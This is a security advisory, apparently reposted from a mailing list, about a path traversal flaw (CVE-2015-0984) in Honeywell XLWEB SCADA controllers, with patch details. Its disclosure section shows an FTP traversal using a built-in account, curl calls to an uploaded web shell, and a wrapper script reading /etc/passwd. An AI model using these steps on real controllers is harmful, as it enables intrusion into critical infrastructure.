Home / exploitsPDF  

Honeywell XLWEB SCADA Path Traversal

Posted on 24 April 2015

SCADA - EXPLOITING CVE-2015-0984 FOR SHELL ACCESS This post is a follow up detailing how to achieve control of the actual XLWEB SCADA controller. The vulnerability is assigned with reference CVE-2015-0984. Rather than the application level administrative access as discussed in the email regarding CVE-2014-2717, this focuses on issues with the FTP, default accounts which could not be changed, and high privileges of the web server user resulting in a simple shell on the server. In this case we are looking at CVE-2015-0984, or ICSA-15-076-02, but we expect to be back with a second disclosure soon when the vendor have had a chance to look at the latest finding, still pending a CVE, if one will be assigned. For those interested in a more readable version of this disclosure and additional information, see https://www.outpost24.com/hacking-industrial-control-systems-case-study-falcon/ Please note that the CVE at NVD uses a different CVSS vector than the one in this disclosure or from ICS-CERT, stating partial confidentiality and no availability or integrity impact. As this gives shell access to the system, I am relatively certain the C:C/A:C/I:C is the correct evaluation. _________________________ *BACKGROUND* Honeywell is a US-based company that maintains offices worldwide. The affected products, XLWeb controllers, are web-based SCADA systems. According to Honeywell, XLWeb controllers are deployed across several sectors including Critical Manufacturing, Energy, Water and Waste water Systems, and others. Honeywell estimates that these products are used primarily in Europe and the Middle East. _________________________ *VULNERABILITY OVERVIEW* The vulnerability is defined as a PATH TRAVERSAL. By using a directory traversal vulnerability in the FTP server, it is possible to gain access to the web root directory. A CVSS v2 base score of 10.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:C/I:C/A:C) That is; Access Vector – Network Access Complexity – Low Authentication – None <--- Built in account used to target the system Complete impact to availability, integrity and confidentiality. Note that NVD uses an incorrect scoring which lists integrity and availability as unaffected, and confidentiality as partial. _________________________ *MITIGATION* The update for this vulnerability is Excel Web Linux version 2.04.01 (March, 2014) or later plus the programming tool CARE version 10.02 (March 2014) or later. Customers are encouraged to contact their local Honeywell HBS branch to have their sites updated to the latest version. In the Centraline partner channel, Excel Web controllers also have been sold under the brand name “FALCON.” Centraline partners can directly access http://www.centraline.com and get these versions. Linux: https://www.centraline.com/index.php?id=847&route=article/index&directory_id=140&direct_link=1 CARE: https://www.centraline.com/index.php?id=847&route=article/index&directory_id=138&direct_link=1 _________________________ *EXTENDED DISCLOSURE* The system has an account for localization and customization of parts of the interfaces. The account is available in numerous guides as found online, account name is XWADMIN. This account has access to the FTP server, and is also available for login via TELNET if present. The XWADMIN user is also the user executing the web-server on the platform. The platform uses a version of PHP with some vendor modifications, of importance to an attacker however is that the server support all the basic functionality one would need from a simple web-shell such as the exec and passthru functions. FTP (Windows command line) FTP honeydemo.internal Connected to honeydemo.internal. 220- ################################################### 220- # # 220- # Welcome to the embedded ftp server # 220- # # 220- ################################################### 220 xlweb FTP server (GNU inetutils 1.3b) ready. User (honeydemo.internal:(none)): xwadmin 331 Password required for xwadmin. Password: 230 User xwadmin logged in. ftp> cd ../../mnt/mtd6/xlweb/web 250 CWD command successful. After uploading the shell, we can interact with the server. I like to keep it simple curl “http://honeydemo.internal/ws.php?code=[secret_string]&cmd=whoami” Response: xwadmin curl “http://honeydemo.internal/ws.php?code=[secret_string]&cmd=id” Response: uid=501(xwadmin) gid=101(xwadmin) And, since we all like a nice wrapper to do our work for us: python codeHoneyWellCVE-2015-0984.PY Starting analysis Attempting connection via FTP to target vulnerability CVE-2015-0984... Connected to target, with authenticated access Using traversal vulnerability to get a shell Uploading shell... Shell uploaded, connecting... Shell open, running commands as xwadmin EXIT to quit CMD >> whoami xwadmin CMD >> cat ../../../../etc/passwd root:x:0:0:Super-User:/root:/bin/sh xwadmin:x:501:101:ExcelWeb-Administrator:/home/xwadmin:/bin/sh modem:x:502:102:Modem-User:/dev/null:/bin/false uucp:x:503:103:Unix-to-Unix CoPy system:/dev/null:/bin/false sshd:x:65535:65534:SSH-Deamon:/dev/null:/bin/false xwtrend:x:504:504:ftp-user:/tmp/xwtrend CMD >> EXIT Running cleanup, deleting shell and closing connections... Done, connection closed As patch penetration currently is close to 0 among the internet facing systems, and only very few have patched the critical risk from 2014, we will not be releasing the script-kiddie friendly tools for neither CVE-2014-2717 nor CVE-2015-0984, but the information here should be sufficient to demonstrate the implications of the issue and the need to apply patches. _________________________ *FURTHER READING *Blog: https://www.outpost24.com/hacking-industrial-control-systems-case-study-falcon/ NVD: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0984 ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-15-076-02 Outpost24 website: https://www.outpost24.com/ As mentioned in the lead in, other issues were found during documentation for this advisory, leading to shell access even on fully patched systems, and the devices should be isolated from public networks. Just as the vendor recommends. _________________________ *FINAL WORDS *Many thanks to Honeywell. During a year of research in the field, only 3 vendors have reacted responsibly and remediated reported issues associated with SCADA systems. Honeywell have done it the fastest, and most efficient. This is why they appear in this disclosure – they have remediated and fixed the critical risk, and we hope other vendors will assume the same responsibility. -- Best Regards, ------------------------------------------------------------------------------------------ Martin Jartelius CSO Outpost24 AB Bastionsgatan 6A | 371 32 Karlskrona | Sweden E: mj () outpost24 com W: www.outpost24.com <http://www.outpost24.com/> Outpost24 - Vulnerability Management Made Easy!

 

TOP